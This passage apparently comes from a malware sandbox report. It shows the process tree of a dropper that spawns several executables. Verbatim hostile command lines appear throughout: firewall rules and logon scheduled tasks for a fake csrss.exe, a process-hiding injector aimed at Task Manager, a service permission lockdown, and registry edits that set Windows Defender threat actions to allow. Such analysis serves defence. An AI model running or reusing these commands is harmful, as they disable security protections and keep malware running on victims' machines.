- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3684

C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe
"C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1524

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:1428

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:3464

C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe
"C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3772

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
3⤵
PID:5856

C:\Users\Admin\Pictures\xf34C1uoc4EnKcwdtLQTFQEf.exe
"C:\Users\Admin\Pictures\xf34C1uoc4EnKcwdtLQTFQEf.exe"
4⤵
- Executes dropped EXE
PID:5460

C:\Users\Admin\AppData\Local\Temp\u47o.0.exe
"C:\Users\Admin\AppData\Local\Temp\u47o.0.exe"
5⤵
- Executes dropped EXE
PID:5740

C:\Users\Admin\AppData\Local\Temp\u47o.2\run.exe
"C:\Users\Admin\AppData\Local\Temp\u47o.2\run.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2348

C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
6⤵
PID:4204

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
7⤵
PID:4280

C:\Users\Admin\AppData\Local\Temp\u47o.3.exe
"C:\Users\Admin\AppData\Local\Temp\u47o.3.exe"
5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3636

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
6⤵
PID:5772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5460 -s 1416
5⤵
- Program crash
PID:3460

C:\Users\Admin\Pictures\VAd2LBJDml5xeUucS9EAra8f.exe
"C:\Users\Admin\Pictures\VAd2LBJDml5xeUucS9EAra8f.exe"
4⤵
- Executes dropped EXE
PID:4796

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:4928

C:\Users\Admin\Pictures\VAd2LBJDml5xeUucS9EAra8f.exe
"C:\Users\Admin\Pictures\VAd2LBJDml5xeUucS9EAra8f.exe"
5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2128

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
- Modifies data under HKEY_USERS
PID:5948

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
6⤵
PID:1032

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
7⤵
- Modifies Windows Firewall
PID:4888

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:3564

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:3312

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
6⤵
PID:4916

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
7⤵
PID:1232

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
7⤵
- Creates scheduled task(s)
PID:3552

C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
7⤵
PID:5968

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
7⤵
PID:4596

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
7⤵
PID:4192

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
7⤵
PID:3144

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
PID:5420

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
7⤵
- Creates scheduled task(s)
PID:2892

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
7⤵
PID:5540

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
8⤵
PID:5288

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
9⤵
- Launches sc.exe
PID:1268

C:\Users\Admin\Pictures\opvxoSGfg9kPcG9AeGBMIMOM.exe
"C:\Users\Admin\Pictures\opvxoSGfg9kPcG9AeGBMIMOM.exe"
4⤵
- Executes dropped EXE
PID:5680

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:2920

C:\Users\Admin\Pictures\opvxoSGfg9kPcG9AeGBMIMOM.exe
"C:\Users\Admin\Pictures\opvxoSGfg9kPcG9AeGBMIMOM.exe"
5⤵
- Executes dropped EXE
PID:5380

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
- Modifies data under HKEY_USERS
PID:6108

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
6⤵
PID:4528

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
7⤵
- Modifies Windows Firewall
PID:3844

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:4192

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:3880

C:\Users\Admin\Pictures\0RVOkCttMp6duWJry0Gs9Wia.exe
"C:\Users\Admin\Pictures\0RVOkCttMp6duWJry0Gs9Wia.exe" --silent --allusers=0
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:5980

C:\Users\Admin\Pictures\0RVOkCttMp6duWJry0Gs9Wia.exe
C:\Users\Admin\Pictures\0RVOkCttMp6duWJry0Gs9Wia.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x6a49e1d0,0x6a49e1dc,0x6a49e1e8
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5072

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\0RVOkCttMp6duWJry0Gs9Wia.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\0RVOkCttMp6duWJry0Gs9Wia.exe" --version
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4216

C:\Users\Admin\Pictures\0RVOkCttMp6duWJry0Gs9Wia.exe
"C:\Users\Admin\Pictures\0RVOkCttMp6duWJry0Gs9Wia.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=5980 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240428232326" --session-guid=97a9a44d-ab81-4cc1-b23c-777b10b78f3e --server-tracking-blob="ZmU5NGY4ZGNlNzAyYmIwZGI5MWYxMjFiZTg0MmFlNmFmNGZlYzQxMDM1NzczNWU3MjNjOTBlZDkwY2Q2NmFhNzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTEiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzE0MzQ2NTk3LjM3NTAiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiYWRiM2ZkZTctODllNS00YmI3LWI3MjktMjZkM2E3MGEyNDgzIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=7004000000000000
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:5412

C:\Users\Admin\Pictures\0RVOkCttMp6duWJry0Gs9Wia.exe
C:\Users\Admin\Pictures\0RVOkCttMp6duWJry0Gs9Wia.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2bc,0x2c0,0x2c4,0x28c,0x2c8,0x69b1e1d0,0x69b1e1dc,0x69b1e1e8
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5144

C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\installer.exe
"C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\installer.exe" --backend --initial-pid=5980 --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --server-tracking-data=server_tracking_data --show-intro-overlay --package-dir="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261" --session-guid=97a9a44d-ab81-4cc1-b23c-777b10b78f3e --server-tracking-blob="ZmU5NGY4ZGNlNzAyYmIwZGI5MWYxMjFiZTg0MmFlNmFmNGZlYzQxMDM1NzczNWU3MjNjOTBlZDkwY2Q2NmFhNzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTEiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzE0MzQ2NTk3LjM3NTAiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiYWRiM2ZkZTctODllNS00YmI3LWI3MjktMjZkM2E3MGEyNDgzIn0= " --silent --desktopshortcut=1 --install-subfolder=109.0.5097.68
6⤵
PID:5884

C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\installer.exe
C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\installer.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x27c,0x280,0x284,0x258,0x288,0x7ff997cf7c80,0x7ff997cf7c8c,0x7ff997cf7c98
7⤵
PID:3880

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\assistant\assistant_installer.exe" --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera\assistant" --copyonly=0 --allusers=0
7⤵
PID:1528

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0xe36038,0xe36044,0xe36050
8⤵
PID:4388

C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --ran-launcher --install-extension="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\be76331b95dfc399cd776d2fc68021e0db03cc4f.crx"
7⤵
PID:4756

C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\opera_crashreporter.exe
C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\opera_crashreporter.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2ac,0x2b0,0x2b4,0x2a8,0x2b8,0x7ff994ade650,0x7ff994ade660,0x7ff994ade670
8⤵
PID:1260

C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=gpu-process --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1872,i,15293325846171049483,3193638017370649213,262144 --variations-seed-version --mojo-platform-channel-handle=1860 /prefetch:2
8⤵
PID:5584

C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --enable-quic --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --field-trial-handle=2076,i,15293325846171049483,3193638017370649213,262144 --variations-seed-version --mojo-platform-channel-handle=2104 /prefetch:3
8⤵
PID:6036

C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --field-trial-handle=2316,i,15293325846171049483,3193638017370649213,262144 --variations-seed-version --mojo-platform-channel-handle=2384 /prefetch:8
8⤵
PID:492

C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --show-intro-overlay --start-maximized
7⤵
PID:6612

C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\opera_crashreporter.exe
C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\opera_crashreporter.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2c0,0x2c4,0x2c8,0x2bc,0x2cc,0x7ff994ade650,0x7ff994ade660,0x7ff994ade670
8⤵
PID:6648

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"
5⤵
PID:5180

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\assistant\assistant_installer.exe" --version
5⤵
PID:6028

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x238,0x23c,0x240,0x214,0x244,0xe36038,0xe36044,0xe36050
6⤵
PID:4496

C:\Users\Admin\Pictures\9s3HoD6vGqGQPo6BT2pzsOGw.exe
"C:\Users\Admin\Pictures\9s3HoD6vGqGQPo6BT2pzsOGw.exe"
4⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2880

C:\Users\Admin\Pictures\D910tg0qjEG8J6uqCMB9zKF2.exe
"C:\Users\Admin\Pictures\D910tg0qjEG8J6uqCMB9zKF2.exe"
4⤵
PID:5720

C:\Users\Admin\AppData\Local\Temp\7zS8090.tmp\Install.exe
.\Install.exe /WkfdidVYT "385118" /S
5⤵
PID:4920

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
6⤵
PID:1564

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
7⤵
PID:2508

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
8⤵
PID:2636

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
9⤵
PID:5776

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
7⤵
PID:4468

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
8⤵
PID:1528

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
9⤵
PID:3384

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
7⤵
PID:5508

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
8⤵
PID:3360

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
9⤵
PID:6000

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
7⤵
PID:2648

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
8⤵
PID:5140

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
9⤵
PID:2532

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
7⤵
PID:1608

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
